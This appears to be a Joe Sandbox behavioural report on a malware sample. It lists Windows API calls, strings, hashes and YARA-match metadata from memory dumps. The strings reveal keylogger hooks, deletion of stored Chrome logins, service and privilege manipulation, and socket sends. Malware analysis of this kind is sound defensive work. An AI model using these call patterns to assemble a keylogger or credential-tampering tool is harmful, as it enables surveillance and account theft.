                                                  • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                  • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                  • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                  • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 02109B3F
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02109B8E
                                                  • GetLastError.KERNEL32 ref: 02109B9C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02109BD4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                  • Instruction ID: 7be8a089f96354f15ba5491deaa924116f8f8fb8aa58b0f3fb49a082cfbb573f
                                                  • Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                  • Instruction Fuzzy Hash: ED815032148344AFC754EB20D890EAFB7A9FF94714F10482DFA8286591EF74EA04DF92
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID: <D$<D$<D
                                                  • API String ID: 745075371-3495170934
                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                  • GetLastError.KERNEL32 ref: 00409A1B
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                  • TranslateMessage.USER32(?), ref: 00409A7A
                                                  • DispatchMessageA.USER32(?), ref: 00409A85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error $`#v
                                                  • API String ID: 3219506041-3226811161
                                                  • Opcode ID: 75b595b8bd9fc6c0a3da4d9f6d32b4c9d6d07c68870121a9c911e84995fb2059
                                                  • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                  • Opcode Fuzzy Hash: 75b595b8bd9fc6c0a3da4d9f6d32b4c9d6d07c68870121a9c911e84995fb2059
                                                  • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                  • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                  • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                  • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0210B6F0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0210B722
                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 0210B790
                                                  • DeleteFileW.KERNEL32(?), ref: 0210B79D
                                                    • Part of subcall function 0210B696: RemoveDirectoryW.KERNEL32(?), ref: 0210B773
                                                  • FindClose.KERNEL32(00000000), ref: 0210B7C8
                                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 0210B7CF
                                                  • GetLastError.KERNEL32 ref: 0210B7D7
                                                  • FindClose.KERNEL32(00000000), ref: 0210B7EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2341273852-0
                                                  • Opcode ID: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
                                                  • Instruction ID: 498420edff77f04716cb58f055d6ed145b430edce2951149e1fc685b7643ec45
                                                  • Opcode Fuzzy Hash: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
                                                  • Instruction Fuzzy Hash: 1831217288821C9ACB20DBB09C88EDA777CAF45305F4405E9F515D20C1EBB5E799CF65
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: @CG$XCG$`HG$`HG$>G
                                                  • API String ID: 341183262-3780268858
                                                  • Opcode ID: 90ddb27719278e926ac88f6a6e5143ea04e6c7eb9df6eceac141c196bda737cd
                                                  • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                  • Opcode Fuzzy Hash: 90ddb27719278e926ac88f6a6e5143ea04e6c7eb9df6eceac141c196bda737cd
                                                  • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00465F1C), ref: 020FB61B
                                                  • FindClose.KERNEL32(00000000), ref: 020FB635
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 020FB758
                                                  • FindClose.KERNEL32(00000000), ref: 020FB77E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                  • API String ID: 2127411465-314212984
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 02109126
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateFindFirst
                                                  • String ID: @CG$XCG$`HG$`HG$>G
                                                  • API String ID: 41799849-3780268858
                                                  APIs
                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                    • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                    • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                  • API String ID: 2281282204-3981147832
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                  • GetLastError.KERNEL32 ref: 0040B261
                                                  Strings
                                                  • UserProfile, xrefs: 0040B227
                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                  • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                  • GetLastError.KERNEL32 ref: 00416B02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004089AE
                                                    • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                    • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                    • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                    • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                  • String ID:
                                                  • API String ID: 4043647387-0
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  APIs
                                                    • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                    • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                    • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                    • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                    • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-1420736420
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                  • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02141769,?,00000000), ref: 021414E3
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02141769,?,00000000), ref: 0214150C
                                                  • GetACP.KERNEL32(?,?,02141769,?,00000000), ref: 02141521
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                  • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                  • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 020F9013
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 020F908B
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 020F90B4
                                                  • FindClose.KERNEL32(?), ref: 020F90CB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 02137185
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 02137192
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0214172A
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 02141785
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 02141794
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,02133F53,00000040,?,02134073,00000055,00000000,?,?,00000055,00000000), ref: 021417DC
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,02133FD3,00000040), ref: 021417FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID:
                                                  • API String ID: 745075371-0
                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction ID: f317a7badd921a5b53864d146b152a77ce33b69838ec1661be2429a4b648409a
                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction Fuzzy Hash: 33517171A40209AFDB14DFA5CC45EBA77B9AF04706F040575E91DEB190EF70D580CB61
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00407A91
                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
